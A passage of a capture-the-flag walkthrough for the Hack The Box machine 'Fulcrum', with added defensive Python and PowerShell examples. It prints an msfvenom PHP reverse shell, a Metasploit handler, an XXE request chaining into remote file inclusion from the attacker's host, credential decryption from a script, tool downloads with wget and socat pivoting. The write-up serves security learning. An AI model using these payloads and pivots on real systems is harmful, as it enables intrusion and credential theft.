&lt;span class=&quot;nt&quot;&gt;&amp;lt;form&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;action=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;upload.php&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;method=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;post&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;enctype=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;multipart/form-data&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
        Select image to upload:
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;p&amp;gt;&amp;lt;input&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;type=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;file&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;name=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;fileToUpload&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;id=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;fileToUpload&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;p&amp;gt;&amp;lt;input&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;type=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;submit&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;value=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Upload Image&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;name=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;submit&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Contents of upload.php&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;language-php highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_POST&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
	&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;nb&quot;&gt;sleep&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
		&lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;&amp;lt;p style=&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;color:red;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&amp;gt;Sorry the file upload failed&amp;lt;/p&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;cp&quot;&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;We can quickly see that the code in &lt;code class=&quot;highlighter-rouge&quot;&gt;index.php&lt;/code&gt; is vulnerable to a textbook &lt;code class=&quot;highlighter-rouge&quot;&gt;php file inclusion&lt;/code&gt; vulnerability. The only thing is, to exploit this vulnerability we need the request to come from the machine’s &lt;code class=&quot;highlighter-rouge&quot;&gt;localhost&lt;/code&gt;. If you attempt to access the page from anywhere other than localhost it will give you the &lt;code class=&quot;highlighter-rouge&quot;&gt;Under maintenance&lt;/code&gt; page. But if the request comes from localhost we hit the second code path of the application, where we control the &lt;code class=&quot;highlighter-rouge&quot;&gt;page&lt;/code&gt; parameter that is passed directly into the &lt;code class=&quot;highlighter-rouge&quot;&gt;include&lt;/code&gt; statement, which we can use to get code execution. &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/&quot;&gt;Additional Reading&lt;/a&gt;&lt;/p&gt;
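&lt;p&gt;The fix for this pattern is language-independent, so here is the same include logic modelled in Python as an added example (not code from the box or from the original post): &lt;code class=&quot;highlighter-rouge&quot;&gt;vulnerable_resolve&lt;/code&gt; reproduces what &lt;code class=&quot;highlighter-rouge&quot;&gt;include($inc.&quot;.php&quot;)&lt;/code&gt; does with an unchecked &lt;code class=&quot;highlighter-rouge&quot;&gt;page&lt;/code&gt; parameter, while &lt;code class=&quot;highlighter-rouge&quot;&gt;hardened_resolve&lt;/code&gt; restricts the name to an allow-list (assumed here to be &lt;em&gt;home&lt;/em&gt; and &lt;em&gt;upload&lt;/em&gt;, the pages gobuster found) and confirms the resolved file sits inside the web root before it would be included. The throwaway web root is constructed by the script itself.&lt;/p&gt;

```python
import os
import tempfile

# Page names the application actually serves. Assumed here from the files
# gobuster reported on port 4; anything not in this set is rejected outright.
ALLOWED_PAGES = frozenset({"home", "upload"})


def vulnerable_resolve(webroot, page):
    """Model of the original index.php: include($inc . ".php") with $inc taken
    straight from the request. Returns the path PHP would try to include, which
    can point anywhere: a traversal path, or with allow_url_include on, a URL."""
    return os.path.join(webroot, page + ".php")


def hardened_resolve(webroot, page):
    """Allow-list the page name, then confirm the resolved file really lives
    under the web root. Returns the absolute path, or None when rejected."""
    if page not in ALLOWED_PAGES:
        return None
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, page + ".php"))
    # Defence in depth: even an allow-listed name must resolve inside the root
    # (guards against a page file that has been replaced by a symlink).
    if os.path.commonpath([root, target]) != root:
        return None
    if not os.path.isfile(target):
        return None
    return target


def make_demo_webroot():
    """Create a throwaway directory mirroring the uploads/ web root."""
    root = tempfile.mkdtemp(prefix="fulcrum-uploads-")
    for name in ("index.php", "home.php", "upload.php"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("placeholder")
    return root


if __name__ == "__main__":
    root = make_demo_webroot()
    probes = ["home", "upload", "index", "../../../etc/passwd",
              "http://10.10.15.74/443"]
    for probe in probes:
        print("page=%r" % probe)
        print("  vulnerable resolves to:", vulnerable_resolve(root, probe))
        print("  hardened resolves to:  ", hardened_resolve(root, probe))
```

&lt;p&gt;The allow-list does the real work: the traversal string and the remote URL are both rejected before any path arithmetic happens, and &lt;em&gt;index&lt;/em&gt; is excluded so the script cannot be made to include itself. The &lt;code class=&quot;highlighter-rouge&quot;&gt;REMOTE_ADDR&lt;/code&gt; check in the original is what forces the XXE to be chained with the include; it is not a substitute for validating the parameter.&lt;/p&gt;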

&lt;h3 id=&quot;getting-shell-via-remote-file-include&quot;&gt;Getting Shell via Remote File Include&lt;/h3&gt;
&lt;p&gt;For what it was worth, getting a shell was relatively simple to execute. You probably could have skipped all of the stuff in the middle section, and gone straight here if you are familiar with php web application vulnerabilities, and what they look like. I believe a lot of people who completed this box did just that.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;generating a regular &lt;code class=&quot;highlighter-rouge&quot;&gt;msfvenom php reverse shell&lt;/code&gt;&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fulcrum/serve# msfvenom -p php/reverse_php LHOST=10.10.15.74 LPORT=443 -f raw &amp;gt; 443.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 3036 bytes
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;You are going to need to serve your payload with some sort of webserver. A python3 &lt;code class=&quot;highlighter-rouge&quot;&gt;http.server&lt;/code&gt; is a quick way to throw up a webserver to host content.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;setting up python http.server&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fulcrum/serve# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Setting up metasploit multi handler to catch shell&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf &amp;gt; use exploit/multi/handler
msf exploit(multi/handler) &amp;gt; set PAYLOAD php/reverse_php
PAYLOAD =&amp;gt; php/reverse_php
msf exploit(multi/handler) &amp;gt; set LHOST tun0
LHOST =&amp;gt; tun0
msf exploit(multi/handler) &amp;gt; set LPORT 443
LPORT =&amp;gt; 443
msf exploit(multi/handler) &amp;gt; set ExitOnSession False
ExitOnSession =&amp;gt; false
msf exploit(multi/handler) &amp;gt; exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.10.15.74:443
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Now all we need to do is use our XXE vulnerability to craft a URL that makes the server fetch our payload through the file include.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;raw request in burpsuite for exploiting the XXE to php file-include&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET / HTTP/1.1

Host: 10.10.10.62:56423
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 131


&amp;lt;!DOCTYPE root [

&amp;lt;!ENTITY % remote SYSTEM &quot;http://127.0.0.1:4/index.php?page=http://10.10.15.74/443&quot;&amp;gt;

%remote; %intern; %xxe;

]&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Sweet got a shell, but getting a shell is only the beginning…&lt;/p&gt;

&lt;p&gt;&lt;em&gt;getting a shell after successful exploitation&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf exploit(multi/handler) &amp;gt; [*] Command shell session 1 opened (10.10.15.74:443 -&amp;gt; 10.10.10.62:47692) at 2018-06-21 22:09:31 -0400

msf exploit(multi/handler) &amp;gt; sessions -i 1
[*] Starting interaction with 1...

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/uploads
ls -la
total 24
drwxr-xr-x 2 root root 4096 Oct  5  2017 .
drwxr-xr-x 6 root root 4096 Oct  5  2017 ..
-rw-r--r-- 1 root root  714 Oct  4  2017 Fulcrum_Upload_to_Corp.ps1
-rw-r--r-- 1 root root  321 Oct  4  2017 home.php
-rw-r--r-- 1 root root  255 Oct  5  2017 index.php
-rw-r--r-- 1 root root  113 Oct  4  2017 upload.php
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;This shell is extremely unstable &amp;amp; will die after a few minutes, so I recommend throwing yourself a regular socat/netcat shell.&lt;/p&gt;

&lt;h2 id=&quot;pivoting&quot;&gt;Pivoting&lt;/h2&gt;
&lt;h3 id=&quot;decryptingrecovering-credentials-in-script-for-psremoting&quot;&gt;Decrypting/Recovering Credentials in Script for PSRemoting&lt;/h3&gt;

&lt;p&gt;Interestingly, we discover a PowerShell script on the box, which is pretty unusual because this machine is labelled as a Linux system.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Contents of Fulcrum_Upload_to_Corp.ps1&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-Powershell&quot;&gt;# TODO: Forward the PowerShell remoting port to the external interface
# Password is now encrypted \o/

$1 = 'WebUser'
$2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ','
$3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA='
$4 = $3 | ConvertTo-SecureString -key $2
$5 = New-Object System.Management.Automation.PSCredential ($1, $4)

Invoke-Command -Computer upload.fulcrum.local -Credential $5 -File Data.ps1
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;We can modify the script slightly so that it decrypts the password for us.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;decrypt.ps1&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-Powershell&quot;&gt;$1 = 'WebUser'
$2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ','
$3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA='
$4 = $3 | ConvertTo-SecureString -key $2
[System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR($4))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Password of WebUser&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;PS C:\&amp;gt; .\decrypt.ps1
M4ng£m£ntPa55
PS C:\&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
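&lt;p&gt;The script above protects nothing, because the AES key (&lt;code class=&quot;highlighter-rouge&quot;&gt;$2&lt;/code&gt;, a 32-element array that PowerShell coerces into a 32-byte key) sits right next to the ciphertext. The following PowerShell is an added example, not code from the write-up or from the box: it shows the key-based form being reversed exactly as decrypt.ps1 does, the DPAPI form that is bound to user and machine, and a small audit function that finds scripts built this way. The secret, the sample key and the path &lt;code class=&quot;highlighter-rouge&quot;&gt;C:\scripts&lt;/code&gt; are constructed values.&lt;/p&gt;

```powershell
# Added example (not from the write-up): why a key embedded in the script protects nothing,
# and a quick audit for scripts built this way. All values below are constructed samples.

$plain  = 'Sample-Secret-123'
$secure = ConvertTo-SecureString -String $plain -AsPlainText -Force

# 1. Key-based protection: ConvertFrom-SecureString -Key is plain AES with a key you supply.
#    When that key is a literal in the same script, anyone who can read the script can
#    reverse the blob, which is all decrypt.ps1 above really does.
[byte[]]$key = 1..32                                   # deliberately obvious sample key (AES-256)
$blob      = ConvertFrom-SecureString -SecureString $secure -Key $key
$recovered = ConvertTo-SecureString -String $blob -Key $key
$bstr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($recovered)
[Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)   # Sample-Secret-123
[Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)

# 2. DPAPI protection: with no -Key the blob is tied to the current user and machine,
#    so a copied script, or another account on the same host, cannot decrypt it.
$dpapiBlob = ConvertFrom-SecureString -SecureString $secure
$dpapiBlob | ConvertTo-SecureString | Out-Null            # succeeds here, fails anywhere else

# 3. Audit: list scripts that hand ConvertTo-SecureString an explicit key on the same line.
function Find-EmbeddedSecureStringKey {
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -Recurse -File -Include *.ps1, *.psm1 |
        Select-String -Pattern 'ConvertTo-SecureString.*-Key\b' |
        ForEach-Object {
            [pscustomobject]@{ File = $_.Path; Line = $_.LineNumber; Text = $_.Line.Trim() }
        }
}
Find-EmbeddedSecureStringKey -Path 'C:\scripts'        # assumed path
```

&lt;p&gt;Run it on the host that owns the secret: the DPAPI blob decrypts there and nowhere else, which is why a scheduled script should store that form (or an Export-Clixml credential) rather than a key array. The audit matches the Fulcrum script as written, since its &lt;code class=&quot;highlighter-rouge&quot;&gt;ConvertTo-SecureString -key $2&lt;/code&gt; call sits on one line.&lt;/p&gt;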

&lt;h3 id=&quot;discovering-192168122x-network&quot;&gt;Discovering 192.168.122.x Network&lt;/h3&gt;
&lt;p&gt;After decrypting the password, the next step was to search for additional containers, virtual machines, or connected networks.&lt;/p&gt;

&lt;p&gt;Running &lt;code class=&quot;highlighter-rouge&quot;&gt;ifconfig&lt;/code&gt; we see this machine has many interfaces, which is extremely unusual for a Hack the Box machine. A network address that stands out is &lt;code class=&quot;highlighter-rouge&quot;&gt;192.168.122.1&lt;/code&gt;, which is very strange. Likely this machine is dual-homed.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;ifconfig output&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;www-data@Fulcrum:~$ ifconfig
corp      Link encap:Ethernet  HWaddr 52:54:00:87:ee:c0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:412 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:32601 (32.6 KB)  TX bytes:0 (0.0 B)

ens32     Link encap:Ethernet  HWaddr 00:50:56:b9:44:f1
          inet addr:10.10.10.62  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:44f1/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:44f1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:72492 errors:0 dropped:82 overruns:0 frame:0
          TX packets:35844 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:11175820 (11.1 MB)  TX bytes:5982295 (5.9 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:241 errors:0 dropped:0 overruns:0 frame:0
          TX packets:241 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:18409 (18.4 KB)  TX bytes:18409 (18.4 KB)

virbr0    Link encap:Ethernet  HWaddr 52:54:00:9c:e7:10
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:53053 errors:0 dropped:0 overruns:0 frame:0
          TX packets:50375 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3317157 (3.3 MB)  TX bytes:2463028 (2.4 MB)

vnet0     Link encap:Ethernet  HWaddr fe:54:00:32:d7:13
          inet6 addr: fe80::fc54:ff:fe32:d713/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4904 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16218 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:493632 (493.6 KB)  TX bytes:1118993 (1.1 MB)

vnet1     Link encap:Ethernet  HWaddr fe:54:00:74:9d:17
          inet6 addr: fe80::fc54:ff:fe74:9d17/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:53053 errors:0 dropped:0 overruns:0 frame:0
          TX packets:61628 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4059899 (4.0 MB)  TX bytes:3048416 (3.0 MB)

vnet2     Link encap:Ethernet  HWaddr fe:54:00:32:59:e0
          inet6 addr: fe80::fc54:ff:fe32:59e0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6321 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18278 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:599472 (599.4 KB)  TX bytes:2537511 (2.5 MB)

vnet3     Link encap:Ethernet  HWaddr fe:54:00:82:69:f5
          inet6 addr: fe80::fc54:ff:fe82:69f5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3146 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15213 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:244122 (244.1 KB)  TX bytes:915975 (915.9 KB)

vnet4     Link encap:Ethernet  HWaddr fe:54:00:01:c6:b8
          inet6 addr: fe80::fc54:ff:fe01:c6b8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7031 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17564 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1952435 (1.9 MB)  TX bytes:1184340 (1.1 MB)

vnet5     Link encap:Ethernet  HWaddr fe:54:00:8f:b9:f9
          inet6 addr: fe80::fc54:ff:fe8f:b9f9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1821 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12593 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:289587 (289.5 KB)  TX bytes:785970 (785.9 KB)

web       Link encap:Ethernet  HWaddr 52:54:00:15:08:7e
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:583 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:65505 (65.5 KB)  TX bytes:0 (0.0 B)
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;To reduce our scope a bit, we can check the ARP table and see which machines this host has talked to recently.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;www-data@Fulcrum:~$ arp -a

? (10.10.10.2) at 00:50:56:aa:9c:8d [ether] on ens32
? (192.168.122.228) at 52:54:00:74:9d:17 [ether] on virbr0
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We see that there is a live host at &lt;code class=&quot;highlighter-rouge&quot;&gt;192.168.122.228&lt;/code&gt;. Our next step was to discover what ports were open on this machine. There are many ways to scan a machine when you are on someone’s internal network, but I prefer to drop a statically compiled version of nmap (and associated modules) if I have the ability to do so. It saves time, and I want to feel at home when I’m on someone’s box.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;www-data@Fulcrum:/tmp/.scan$ wget http://10.10.15.74:6666/nmap.tar.gz
--2018-06-22 03:30:11--  http://10.10.15.74:6666/nmap.tar.gz
Connecting to 10.10.15.74:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4875842 (4.6M) [application/gzip]
Saving to: 'nmap.tar.gz'

nmap.tar.gz         100%[===================&amp;gt;]   4.65M  1.04MB/s    in 6.8s

2018-06-22 03:30:19 (705 KB/s) - 'nmap.tar.gz' saved [4875842/4875842]

www-data@Fulcrum:/tmp/.scan$ clear
TERM environment variable not set.
www-data@Fulcrum:/tmp/.scan$ ls
nmap.tar.gz
www-data@Fulcrum:/tmp/.scan$ tar -xvf nmap.tar.gz
...[snip]...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Downloading our statically compiled nmap&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;www-data@Fulcrum:/tmp/.scan$ wget http://10.10.15.74:6666/nmapstatic
--2018-06-22 03:36:28--  http://10.10.15.74:6666/nmapstatic
Connecting to 10.10.15.74:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5944464 (5.7M) [application/octet-stream]
Saving to: 'nmapstatic'

nmapstatic          100%[===================&amp;gt;]   5.67M   576KB/s    in 11s

2018-06-22 03:36:40 (506 KB/s) - 'nmapstatic' saved [5944464/5944464]
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;To scan with our statically compiled nmap we use the &lt;code class=&quot;highlighter-rouge&quot;&gt;--datadir&lt;/code&gt; option to point it at the extracted data files; with this we can port scan just as easily as if we were doing it from our own box.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;www-data@Fulcrum:/tmp/.scan$ ./nmapstatic --datadir nmap/ -p- 192.168.122.228

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2018-06-22 03:39 BST
Nmap scan report for 192.168.122.228
Host is up (0.0022s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
5986/tcp open  wsmans
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 165.06 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;As we thought, there seems to be a Windows host attached, with &lt;a href=&quot;https://blogs.technet.microsoft.com/christwe/2012/06/20/what-port-does-powershell-remoting-use/&quot;&gt;PowerShell remoting&lt;/a&gt; enabled.&lt;/p&gt;

&lt;h3 id=&quot;pivoting-from-fulcrum-host-to-192168122x-network&quot;&gt;Pivoting from Fulcrum Host to 192.168.122.x Network&lt;/h3&gt;

&lt;p&gt;To use PSRemoting properly from my host machine, we are going to need to set up a pivot. The general gist of what we need to accomplish is expressed in this diagram.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fulcrum/11.png&quot; alt=&quot;&amp;quot;Pivot Setup&amp;quot;&quot; title=&quot;Pivot Setup&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I’m going to use &lt;code class=&quot;highlighter-rouge&quot;&gt;socat&lt;/code&gt; for the majority of this because it’s a tool I am very familiar with, and it’s pretty easy to use, although you can achieve the same results using Metasploit, ssh, or some other similar tool.&lt;/p&gt;

&lt;p&gt;We are going to listen for connections on port 55555 and relay each connection to &lt;code class=&quot;highlighter-rouge&quot;&gt;192.168.122.228&lt;/code&gt; on port 5986 (the PSRemoting port).&lt;/p&gt;

&lt;p&gt;&lt;em&gt;on fulcrum machine (10.10.10.62)&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;www-data@Fulcrum:/tmp/ ./socat tcp-listen:55555,reuseaddr,fork tcp:192.168.122.228:5986
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;on my kali box (192.168.30.130)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;What this does is listen for connections on port 5986 and relay each connection to 10.10.10.62 on port 55555.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~# socat tcp-listen:5986,reuseaddr,fork tcp:10.10.10.62:55555
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Now from my (local) Windows 10 host we can connect to my Kali host (192.168.30.130), and it will relay that connection through our pivots to the network we are attempting to reach.
We need the additional &lt;em&gt;-SessionOption&lt;/em&gt;s &lt;code class=&quot;highlighter-rouge&quot;&gt;-SkipCACheck -SkipCNCheck&lt;/code&gt; because otherwise you get two error messages stating that &lt;code class=&quot;highlighter-rouge&quot;&gt;The SSL certificate is signed by an unknown certificate authority.&lt;/code&gt; &amp;amp; &lt;code class=&quot;highlighter-rouge&quot;&gt;The SSL certificate contains a common name (CN) that does not match the hostname.&lt;/code&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;PS C:\&amp;gt; Enter-PSSession -Computername 192.168.30.130 -Credential &quot;Webuser&quot; -UseSSL -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)
